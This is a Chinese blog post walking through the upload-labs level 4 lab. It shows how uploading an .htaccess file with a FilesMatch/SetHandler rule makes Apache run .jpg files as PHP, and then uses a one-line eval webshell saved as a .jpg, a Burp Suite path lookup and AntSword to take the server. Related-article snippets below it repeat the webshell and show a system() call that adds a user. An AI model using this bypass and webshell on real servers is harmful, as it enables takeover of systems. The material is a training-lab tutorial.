文件上传之 .htaccess文件getshell

最新推荐文章于 2024-05-01 06:22:28 发布
最新推荐文章于 2024-05-01 06:22:28 发布
阅读量9.9k 收藏 37
点赞数 33
分类专栏: Web安全 文章标签: 文件上传 .htaccess getshell apache filematche
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46684578/article/details/119141109
版权

文件上传之 .htaccess文件getshell

.htaccess文件

htaccess 在站点的根目录下面,不是在apache目录下,但是它属于apache的一个配置文件

htaccess文件时Apache服务中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮助我们实现:网页301重定向、自定义404错误页面,改变文件扩展名、允许/阻止特定的用户或者目录的访问,禁止目录列表,配置默认文档等功能

其中.htaccess文件内容:SetHandler application/x-http-php的意思是设置当前目录所有文件都使用php解析,那么无论上传任何文件,只要符合php语言代码规范,就会被当做PHP执行。不符合规则则报错

http.conf文件(前提条件)

在此文件中设置 AllowOverried All ,才能使用.htaccess文件
请添加图片描述

利用htaccess文件getshell

实验环境:upload-labs 的 less-4

下载地址:https://github.com/c0ny1/upload-labs

如果在一个黑名单中添加了很多后缀名,唯独没有对htaccess过滤,可以直接上传.htaccess来设置使用php解析任意文件。

<FilesMatch "\.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>

源码分析

对php,asp,jsp等进行过滤,大小写的方式也不行

但是可以上传.jpg文件,可是 .jpg只有解析成 php文件才能getshell

因此我们需要先上传 .htaccess 文件,然后再上传 .jpg文件
请添加图片描述

创建.htaccess文件

在本地创建一个.htacces文件,输入以下内容,**然后点击另存为,将保存类型设置为所有文件

请添加图片描述

上传.htaccess文件

由于没有对.htaccess文件进行过滤,因此我们可以上传.htaccess文件

上传一句话木马

保存为 stack.jpg 文件

<?php eval($_POST['a']); ?>

获取绝对路径

通过burpsuite抓包的方式得到上传的路径:http://127.0.0.1/upload-labs-master/upload/stack.jpg

做法如下:

  1. 点击response to this reuqest ,再点击forword,得到响应包

请添加图片描述2. 观察响应包的内容
请添加图片描述这样就得到了绝对路径

蚁剑getshell

请添加图片描述

Buffedon
关注
  • 33
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
文件上传一句话木马getshell
qq_41620273的博客
12-25 5557
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
虚拟主机绑定多个网站htaccess写法
不定时分享最优质的网络技术与教程,满满的干货。
12-13 200
m.yangqq.net 是二级域名。保存文档为.htaccess。/m 是存放的文件夹名称。
文件上传笔记(.htaccess
weixin_43827234的博客
08-11 75
最后连接119.jpg这个文件就可以连接了。然后在上传点先上传.htaccess文件。然后再上传名为119.jpg的图片马。首先确定网站是PHP编写的。
CTFHub技能树 Web-文件上传 详解
weixin_45808483的博客
11-15 2646
无验证 启动环境 我们上传一句话木马 <?php @eval($_POST['shell']);?> 提示了相对路径, 我们直接使用蚁剑连接。 找到flag。 前端验证 上传php文件,前端校验不允许上传php文件 审计代码,只允许上传图片类型 我们先将后缀改为 .jpg 上传成功 再通过burp抓包,修改filename="1.php"和Content-Type: php 发送数据包,页面显示上传成功 使用蚁剑连接 成...
2024年最全【Web安全】htaccess攻击_
最新发布
2401_84281638的博客
05-01 485
参考于[CTF].htaccess的使用技巧总结,由于是偏笔记类的博客,所以不给出太多的案例。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。 观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。 当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的
upload-labs关卡4(黑名单点空格绕过或htaccess绕过)通关思路
zyh1588的博客
11-09 1061
小白回顾文件上传靶场第四关
全网最全超详细.htaccess语法讲解
张无忌
06-24 7213
概述来说,htaccess文件Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。Unix、Linux系统或者是任何版本的Apache Web服务器都是支持.htaccess的,但是有的主机服务商可能不允许你自定义自己的.htaccess文件.htaccess文件可以的事情,主要包括:文件夹密码保护、用户自定义重定向、自定义4
.htaccess学习
m0_61448651的博客
07-20 963
.htaccess学习
WEB安全基础-文件上传
HAKUNAMATATATTA的博客
11-21 2499
什么是文件上传---将客户端数据以文件形式封装,通过网络协议发送到服务器端。在服务器端解析数据,最终在服务端硬盘上作为真实的文件保存。通常一个文件以HTTP协议进行上传时,将以POST请求发送至Web服务器,Web服务器收到请求并同意后,用户与Web服务器将建立连接,并传输数据。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,"文件上传"本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件
妙用.htaccess隐藏网页文件扩展名
09-30
这通常是通过服务器配置文件`.htaccess`实现的,它允许我们进行URL重写,从而达到隐藏特定文件类型扩展名的目的。在本案例中,我们将讨论如何利用`.htaccess`隐藏PHP文件的扩展名。 首先,`.htaccess`(分布式配置...
Apache服务器中.htaccess文件的实用配置示例集锦
09-10
Apache服务器中的`.htaccess`文件是一个非常重要的工具,它允许网站管理员无需直接修改服务器的主配置文件即可控制和定制特定目录的行为。`.htaccess`文件主要用于实现一系列HTTP服务器的指令,如URL重写、访问控制...
PHP中的.htaccess伪静态文件
09-10
`.htaccess`文件是一个配置文件,它允许我们在不修改服务器主配置的情况下,控制服务器的行为,比如实现URL重写,也就是将动态URL转换为静态化的形式。 `.htaccess`文件中的伪静态规则通常是基于正则表达式的,用于...
nginx支持.htaccess文件实现伪静态的方法分享
01-20
在Google上搜索的资料很多人都说nginx目前不支持.htaccess文件,我按照nginx的规则试验了一下,结果发现nginx是完全支持.htaccess文件的! 方法如下: 1. 在需要使用.htaccess文件的目录下新建一个.htaccess文件, ...
21个常用的apache .htaccess文件配置技巧分享
01-10
Apache Web 服务器可以通过 .htaccess 文件来操作各种信息,这是一个目录级配置文件的默认名称,允许去中央化的 Web 服务器配置管理。可用来重写服务器的全局配置。该文件的目的就是为了允许单独目录的访问控制配置...
.htacess详解
06-02 580
.htaccess是什么 .htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来...
使用.htaccess实现apache URL重定向
aishuxi7641的博客
09-07 1119
一、什么是URL重定向?   URL重定向(URL redirection,或称网址重定向或网域名称转址),是指当使用者浏览某个网址时,将他导向到另一个网址的技术。 二、URL重定向怎么配置?   1)首先需要apache开启重定向,修改httpd.conf配置: 1 查找: 2 Options FollowSymLinks 3   AllowOverrid...
.htaccess语法讲解
chengjianghao的博客
01-25 204
如果设置了 RegExp 对象的 Multiline 属性,则 $ 也匹配 '\n' 或 '\r'。要匹配 $ 字符本身,请使用 \$。^ 匹配输入字符串的开始位置,除非在方括号表达式中使用,当该符号在方括号表达式中使用时,表示不接受该方括号表达式中的字符集合。() $1 $2 一个括号代表一个分组,第一个括号里匹配的内容就用$1引用,第二个括号匹配的内容用$2引用,以此类推.....{n,} 重复n次或更多次。\w 匹配字母或数字或下划线或汉字。\b 匹配单词的开始或结束。
文件上传(入门)学习(续)
Z11762的博客
03-28 1855
了解了基本原理之后,需要分析它怎么起作用,如果按照上述的做法来做,则00绕过只能绕过前端验证,因为如果是后端验证,那么即使后缀被截断了,处理之后为.php,还是会被后端验证拦截,所以不是什么情况下00截断都有用的,但是可以确定,在绕过前端验证可以用。(2)该文件还会匹配文件名中的关键字,如:[1.php.jpg]中包含.php,并且.htaccess文件的内容如下,[1.php.jpg]中的代码就会被执行。(3)匹配文件名,当.htaccess文件内容如下,它可以将匹配到的文件名的文件中的代码执行。
文件上传漏洞笔记
weixin_42695055的博客
01-09 796
由于程序员在对用户文件上传功能实现代码没有严格限制用户上传文件后缀以及文件类型或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件
ctf技能树文件上传.htaccess
04-30
文件上传漏洞通常是指在网站中存在对用户上传文件的功能,但是没有对上传文件的类型、大小、数量、路径等进行严格限制或过滤,从而导致攻击者可以通过上传包含恶意代码的文件来实现攻击的目的。而.htaccess是一个常用于Apache服务器的配置文件,可以用来设置网站的访问权限、页面重定向、防止目录遍历等功能。 因此,攻击者可以通过上传一个包含了.htaccess文件的恶意文件来实现对服务器的攻击。比如,攻击者可以在.htaccess文件中添加一些重定向规则,将用户的访问请求重定向到攻击者控制的恶意网站上,从而实现诱导用户下载恶意软件或者窃取用户敏感信息等攻击。 防范措施: 1. 限制上传文件的类型、大小、数量等,可以通过后台代码或第三方插件实现; 2. 对上传文件进行严格过滤和检查,确保不包含任何可执行的恶意代码; 3. 对服务器上的.htaccess文件进行定期检查和清理,确保其中不包含任何不安全的设置; 4. 定期升级服务器操作系统、Web服务器和相关应用程序的补丁,确保服务器的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Buffedon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值